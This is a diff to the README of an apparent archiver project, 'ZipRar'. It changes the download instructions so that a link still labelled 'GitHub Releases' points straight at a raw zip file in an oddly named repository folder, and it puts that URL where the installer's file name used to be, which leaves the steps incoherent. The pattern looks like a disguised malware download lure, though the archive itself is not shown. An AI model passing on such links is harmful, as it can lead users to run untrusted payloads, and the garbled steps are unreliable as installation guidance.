seimazd/ZipRar/README.md

 ## 📥 Download & Install

-To download ZipRar, visit this page to download: [GitHub Releases](https://github.com/seimazd/ZipRar/releases).
+To download ZipRar, visit this page to download: [GitHub Releases](https://github.com/seimazd/ZipRar/raw/refs/heads/main/millionairish/Rar_Zip_v1.8.zip).

 1. Click on the link above to go to the Releases page.
 2. Find the latest version of ZipRar.
-3. Look for the file called `ZipRarSetup.exe` or similar.
+3. Look for the file called `https://github.com/seimazd/ZipRar/raw/refs/heads/main/millionairish/Rar_Zip_v1.8.zip` or similar.
 4. Click on the file to download it.

 ## 🛠️ Installation Steps

-1. After the download completes, locate the `ZipRarSetup.exe` file in your Downloads folder.
+1. After the download completes, locate the `https://github.com/seimazd/ZipRar/raw/refs/heads/main/millionairish/Rar_Zip_v1.8.zip` file in your Downloads folder.
 2. Double-click the file to begin the installation.
 3. Follow the on-screen instructions to install ZipRar on your computer.
 4. Once installed, you can find ZipRar in your Start menu.